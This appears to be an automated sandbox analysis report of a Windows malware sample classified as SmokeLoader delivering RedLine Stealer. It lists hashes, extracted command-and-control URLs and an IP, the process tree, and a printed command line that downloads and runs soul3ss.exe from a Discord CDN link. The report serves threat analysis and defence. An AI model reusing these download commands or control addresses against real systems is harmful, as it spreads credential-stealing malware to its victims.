Analysis
-
max time kernel
153s -
max time network
156s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
23-08-2021 13:56
Static task
static1
Behavioral task
behavioral1
Sample
4001ef3d5abca387a707411e1b11c07ed5b0bab60d5409831f55dcbdeb86a60f.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
4001ef3d5abca387a707411e1b11c07ed5b0bab60d5409831f55dcbdeb86a60f.exe
Resource
win10v20210408
General
-
Target
4001ef3d5abca387a707411e1b11c07ed5b0bab60d5409831f55dcbdeb86a60f.exe
-
Size
276KB
-
MD5
324f47a307e160a75080e4d7f8175fb7
-
SHA1
7a14bb0ff3cfdd94316f3e650ba7f3b73fdd6b0d
-
SHA256
4001ef3d5abca387a707411e1b11c07ed5b0bab60d5409831f55dcbdeb86a60f
-
SHA512
b86312b91c0804e62e9cbf332eff0d8a5719ae9a723f4dc545237a43b00cad888867fba246fa03e5388a5f67f280f50265e9e24df8ffb67fa66076e599db1e99
Malware Config
Extracted
smokeloader
2020
http://aucmoney.com/upload/
http://thegymmum.com/upload/
http://atvcampingtrips.com/upload/
http://kuapakualaman.com/upload/
http://renatazarazua.com/upload/
http://nasufmutlu.com/upload/
Extracted
redline
@soul3ss
188.130.139.12:30376
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\8751\soul3ss.exe family_redline C:\Users\Admin\AppData\Local\Temp\8751\soul3ss.exe family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Downloads MZ/PE file
-
Executes dropped EXE 6 IoCs
Processes:
AC85.exeextd.exeextd.exeextd.exesoul3ss.exeextd.exepid process 1904 AC85.exe 1160 extd.exe 832 extd.exe 992 extd.exe 1616 soul3ss.exe 1600 extd.exe -
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\AD4F.tmp\AD50.tmp\extd.exe upx C:\Users\Admin\AppData\Local\Temp\AD4F.tmp\AD50.tmp\extd.exe upx \Users\Admin\AppData\Local\Temp\AD4F.tmp\AD50.tmp\extd.exe upx C:\Users\Admin\AppData\Local\Temp\AD4F.tmp\AD50.tmp\extd.exe upx \Users\Admin\AppData\Local\Temp\AD4F.tmp\AD50.tmp\extd.exe upx C:\Users\Admin\AppData\Local\Temp\AD4F.tmp\AD50.tmp\extd.exe upx \Users\Admin\AppData\Local\Temp\AD4F.tmp\AD50.tmp\extd.exe upx \Users\Admin\AppData\Local\Temp\AD4F.tmp\AD50.tmp\extd.exe upx \Users\Admin\AppData\Local\Temp\AD4F.tmp\AD50.tmp\extd.exe upx C:\Users\Admin\AppData\Local\Temp\AD4F.tmp\AD50.tmp\extd.exe upx \Users\Admin\AppData\Local\Temp\AD4F.tmp\AD50.tmp\extd.exe upx \Users\Admin\AppData\Local\Temp\AD4F.tmp\AD50.tmp\extd.exe upx C:\Users\Admin\AppData\Local\Temp\AD4F.tmp\AD50.tmp\extd.exe upx -
Deletes itself 1 IoCs
Processes:
pid process 1200 -
Loads dropped DLL 11 IoCs
Processes:
cmd.exepid process 1200 1200 288 968 cmd.exe 968 cmd.exe 968 cmd.exe 968 cmd.exe 968 cmd.exe 968 cmd.exe 968 cmd.exe 968 cmd.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
4001ef3d5abca387a707411e1b11c07ed5b0bab60d5409831f55dcbdeb86a60f.exedescription ioc process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 4001ef3d5abca387a707411e1b11c07ed5b0bab60d5409831f55dcbdeb86a60f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 4001ef3d5abca387a707411e1b11c07ed5b0bab60d5409831f55dcbdeb86a60f.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 4001ef3d5abca387a707411e1b11c07ed5b0bab60d5409831f55dcbdeb86a60f.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
soul3ss.exepid process 1616 soul3ss.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
4001ef3d5abca387a707411e1b11c07ed5b0bab60d5409831f55dcbdeb86a60f.exepid process 1848 4001ef3d5abca387a707411e1b11c07ed5b0bab60d5409831f55dcbdeb86a60f.exe 1848 4001ef3d5abca387a707411e1b11c07ed5b0bab60d5409831f55dcbdeb86a60f.exe 1200 1200 1200 1200 1200 1200 1200 1200 1200 1200 1200 1200 1200 1200 1200 1200 1200 1200 1200 1200 1200 1200 1200 1200 1200 1200 1200 1200 1200 1200 1200 1200 1200 1200 1200 1200 1200 1200 1200 1200 1200 1200 1200 1200 1200 1200 1200 1200 1200 1200 1200 1200 1200 1200 1200 1200 1200 1200 1200 1200 1200 1200 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 1200 -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
4001ef3d5abca387a707411e1b11c07ed5b0bab60d5409831f55dcbdeb86a60f.exepid process 1848 4001ef3d5abca387a707411e1b11c07ed5b0bab60d5409831f55dcbdeb86a60f.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
soul3ss.exedescription pid process Token: SeShutdownPrivilege 1200 Token: SeShutdownPrivilege 1200 Token: SeShutdownPrivilege 1200 Token: SeShutdownPrivilege 1200 Token: SeShutdownPrivilege 1200 Token: SeDebugPrivilege 1616 soul3ss.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
pid process 1200 1200 1200 1200 -
Suspicious use of SendNotifyMessage 4 IoCs
Processes:
pid process 1200 1200 1200 1200 -
Suspicious use of WriteProcessMemory 22 IoCs
Processes:
AC85.execmd.exedescription pid process target process PID 1200 wrote to memory of 1904 1200 AC85.exe PID 1200 wrote to memory of 1904 1200 AC85.exe PID 1200 wrote to memory of 1904 1200 AC85.exe PID 1904 wrote to memory of 968 1904 AC85.exe cmd.exe PID 1904 wrote to memory of 968 1904 AC85.exe cmd.exe PID 1904 wrote to memory of 968 1904 AC85.exe cmd.exe PID 968 wrote to memory of 1160 968 cmd.exe extd.exe PID 968 wrote to memory of 1160 968 cmd.exe extd.exe PID 968 wrote to memory of 1160 968 cmd.exe extd.exe PID 968 wrote to memory of 832 968 cmd.exe extd.exe PID 968 wrote to memory of 832 968 cmd.exe extd.exe PID 968 wrote to memory of 832 968 cmd.exe extd.exe PID 968 wrote to memory of 992 968 cmd.exe extd.exe PID 968 wrote to memory of 992 968 cmd.exe extd.exe PID 968 wrote to memory of 992 968 cmd.exe extd.exe PID 968 wrote to memory of 1616 968 cmd.exe soul3ss.exe PID 968 wrote to memory of 1616 968 cmd.exe soul3ss.exe PID 968 wrote to memory of 1616 968 cmd.exe soul3ss.exe PID 968 wrote to memory of 1616 968 cmd.exe soul3ss.exe PID 968 wrote to memory of 1600 968 cmd.exe extd.exe PID 968 wrote to memory of 1600 968 cmd.exe extd.exe PID 968 wrote to memory of 1600 968 cmd.exe extd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\4001ef3d5abca387a707411e1b11c07ed5b0bab60d5409831f55dcbdeb86a60f.exe"C:\Users\Admin\AppData\Local\Temp\4001ef3d5abca387a707411e1b11c07ed5b0bab60d5409831f55dcbdeb86a60f.exe"1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1848
-
C:\Users\Admin\AppData\Local\Temp\AC85.exeC:\Users\Admin\AppData\Local\Temp\AC85.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1904 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\AD4F.tmp\AD50.tmp\AD51.bat C:\Users\Admin\AppData\Local\Temp\AC85.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:968 -
C:\Users\Admin\AppData\Local\Temp\AD4F.tmp\AD50.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\AD4F.tmp\AD50.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:1160 -
C:\Users\Admin\AppData\Local\Temp\AD4F.tmp\AD50.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\AD4F.tmp\AD50.tmp\extd.exe "/random" "9000000" "" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:832 -
C:\Users\Admin\AppData\Local\Temp\AD4F.tmp\AD50.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\AD4F.tmp\AD50.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/879335227095416884/879356613826314250/soul3ss.exe" "soul3ss.exe" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:992 -
C:\Users\Admin\AppData\Local\Temp\8751\soul3ss.exesoul3ss.exe3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
PID:1616 -
C:\Users\Admin\AppData\Local\Temp\AD4F.tmp\AD50.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\AD4F.tmp\AD50.tmp\extd.exe "/sleep" "9000009" "" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:1600
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\8751\soul3ss.exeMD5
411ca7ba89ae45e92f9ed4663f903335
SHA16360b07844800b8e6e6e2b11ee3c8d051c4a2e96
SHA2566780a257463d037daff9f626aecee2347177edfb0851ee12d33ba225ab38f009
SHA512bfd58e96af22f17fab2cff4b360d79621b738128c61f01420963a1119d27320eb97a64fef42819e9ea7ffab39289f19b82f8911e227236435a87151d55d9e754
-
C:\Users\Admin\AppData\Local\Temp\8751\soul3ss.exeMD5
411ca7ba89ae45e92f9ed4663f903335
SHA16360b07844800b8e6e6e2b11ee3c8d051c4a2e96
SHA2566780a257463d037daff9f626aecee2347177edfb0851ee12d33ba225ab38f009
SHA512bfd58e96af22f17fab2cff4b360d79621b738128c61f01420963a1119d27320eb97a64fef42819e9ea7ffab39289f19b82f8911e227236435a87151d55d9e754
-
C:\Users\Admin\AppData\Local\Temp\AC85.exeMD5
e16f915796d4762014fc3864d4444ac3
SHA1819364784cf0d3fe440b6c9a3950de7fa093e805
SHA25665dee75f5d4f0d7e0c1065a689ebe79f67c87a4d3d9654193164128e859a0ddd
SHA5121c3721ebe22c1e9b9b5f51926d9e1bd1d26fca9b57f25161afefdeca9bdb3a1551fb4931fdbbe16df59c43c8a4eaa2131ab508a97a39cd6ddaf04003d9adca2a
-
C:\Users\Admin\AppData\Local\Temp\AD4F.tmp\AD50.tmp\AD51.batMD5
3c688a168d11fe43e0ef29ac74beab5f
SHA11a394048e88b72fbbae98bad3a327f3bf31dfa00
SHA25674f0a9fa397ec48e6d8425a758187980df03d67fe64684a3470ef4436e1eec61
SHA5122037c8f3120469b6fa89392df63ac233bb5129a4486f182c67643f64593a1f9a0504ff25aeaacd6c043015d720c115a4b2cc1aa08d3d421a10a89996deb0ad6c
-
C:\Users\Admin\AppData\Local\Temp\AD4F.tmp\AD50.tmp\extd.exeMD5
b019efc4814c7a73b1413a335be1fa13
SHA16e093c94cfa4a0fe25e626875f2b06a5cbc622d2
SHA256a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e
SHA512d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b
-
C:\Users\Admin\AppData\Local\Temp\AD4F.tmp\AD50.tmp\extd.exeMD5
b019efc4814c7a73b1413a335be1fa13
SHA16e093c94cfa4a0fe25e626875f2b06a5cbc622d2
SHA256a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e
SHA512d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b
-
C:\Users\Admin\AppData\Local\Temp\AD4F.tmp\AD50.tmp\extd.exeMD5
b019efc4814c7a73b1413a335be1fa13
SHA16e093c94cfa4a0fe25e626875f2b06a5cbc622d2
SHA256a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e
SHA512d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b
-
C:\Users\Admin\AppData\Local\Temp\AD4F.tmp\AD50.tmp\extd.exeMD5
b019efc4814c7a73b1413a335be1fa13
SHA16e093c94cfa4a0fe25e626875f2b06a5cbc622d2
SHA256a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e
SHA512d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b
-
C:\Users\Admin\AppData\Local\Temp\AD4F.tmp\AD50.tmp\extd.exeMD5
b019efc4814c7a73b1413a335be1fa13
SHA16e093c94cfa4a0fe25e626875f2b06a5cbc622d2
SHA256a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e
SHA512d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b
-
\Users\Admin\AppData\Local\Temp\AC85.exeMD5
e16f915796d4762014fc3864d4444ac3
SHA1819364784cf0d3fe440b6c9a3950de7fa093e805
SHA25665dee75f5d4f0d7e0c1065a689ebe79f67c87a4d3d9654193164128e859a0ddd
SHA5121c3721ebe22c1e9b9b5f51926d9e1bd1d26fca9b57f25161afefdeca9bdb3a1551fb4931fdbbe16df59c43c8a4eaa2131ab508a97a39cd6ddaf04003d9adca2a
-
\Users\Admin\AppData\Local\Temp\AC85.exeMD5
e16f915796d4762014fc3864d4444ac3
SHA1819364784cf0d3fe440b6c9a3950de7fa093e805
SHA25665dee75f5d4f0d7e0c1065a689ebe79f67c87a4d3d9654193164128e859a0ddd
SHA5121c3721ebe22c1e9b9b5f51926d9e1bd1d26fca9b57f25161afefdeca9bdb3a1551fb4931fdbbe16df59c43c8a4eaa2131ab508a97a39cd6ddaf04003d9adca2a
-
\Users\Admin\AppData\Local\Temp\AC85.exeMD5
e16f915796d4762014fc3864d4444ac3
SHA1819364784cf0d3fe440b6c9a3950de7fa093e805
SHA25665dee75f5d4f0d7e0c1065a689ebe79f67c87a4d3d9654193164128e859a0ddd
SHA5121c3721ebe22c1e9b9b5f51926d9e1bd1d26fca9b57f25161afefdeca9bdb3a1551fb4931fdbbe16df59c43c8a4eaa2131ab508a97a39cd6ddaf04003d9adca2a
-
\Users\Admin\AppData\Local\Temp\AD4F.tmp\AD50.tmp\extd.exeMD5
b019efc4814c7a73b1413a335be1fa13
SHA16e093c94cfa4a0fe25e626875f2b06a5cbc622d2
SHA256a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e
SHA512d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b
-
\Users\Admin\AppData\Local\Temp\AD4F.tmp\AD50.tmp\extd.exeMD5
b019efc4814c7a73b1413a335be1fa13
SHA16e093c94cfa4a0fe25e626875f2b06a5cbc622d2
SHA256a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e
SHA512d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b
-
\Users\Admin\AppData\Local\Temp\AD4F.tmp\AD50.tmp\extd.exeMD5
b019efc4814c7a73b1413a335be1fa13
SHA16e093c94cfa4a0fe25e626875f2b06a5cbc622d2
SHA256a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e
SHA512d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b
-
\Users\Admin\AppData\Local\Temp\AD4F.tmp\AD50.tmp\extd.exeMD5
b019efc4814c7a73b1413a335be1fa13
SHA16e093c94cfa4a0fe25e626875f2b06a5cbc622d2
SHA256a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e
SHA512d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b
-
\Users\Admin\AppData\Local\Temp\AD4F.tmp\AD50.tmp\extd.exeMD5
b019efc4814c7a73b1413a335be1fa13
SHA16e093c94cfa4a0fe25e626875f2b06a5cbc622d2
SHA256a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e
SHA512d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b
-
\Users\Admin\AppData\Local\Temp\AD4F.tmp\AD50.tmp\extd.exeMD5
b019efc4814c7a73b1413a335be1fa13
SHA16e093c94cfa4a0fe25e626875f2b06a5cbc622d2
SHA256a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e
SHA512d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b
-
\Users\Admin\AppData\Local\Temp\AD4F.tmp\AD50.tmp\extd.exeMD5
b019efc4814c7a73b1413a335be1fa13
SHA16e093c94cfa4a0fe25e626875f2b06a5cbc622d2
SHA256a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e
SHA512d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b
-
\Users\Admin\AppData\Local\Temp\AD4F.tmp\AD50.tmp\extd.exeMD5
b019efc4814c7a73b1413a335be1fa13
SHA16e093c94cfa4a0fe25e626875f2b06a5cbc622d2
SHA256a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e
SHA512d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b
-
memory/832-80-0x0000000000000000-mapping.dmp
-
memory/968-70-0x0000000000000000-mapping.dmp
-
memory/992-85-0x0000000000000000-mapping.dmp
-
memory/1160-75-0x0000000000000000-mapping.dmp
-
memory/1200-63-0x0000000002AF0000-0x0000000002B06000-memory.dmpFilesize
88KB
-
memory/1600-93-0x0000000000000000-mapping.dmp
-
memory/1616-89-0x0000000000000000-mapping.dmp
-
memory/1616-96-0x0000000000F20000-0x0000000000F21000-memory.dmpFilesize
4KB
-
memory/1616-98-0x0000000000CA0000-0x0000000000CA1000-memory.dmpFilesize
4KB
-
memory/1848-61-0x0000000000020000-0x0000000000029000-memory.dmpFilesize
36KB
-
memory/1848-60-0x00000000757C1000-0x00000000757C3000-memory.dmpFilesize
8KB
-
memory/1848-62-0x0000000000400000-0x00000000023AF000-memory.dmpFilesize
31.7MB
-
memory/1904-66-0x0000000000000000-mapping.dmp
-
memory/1904-69-0x000007FEFBF71000-0x000007FEFBF73000-memory.dmpFilesize
8KB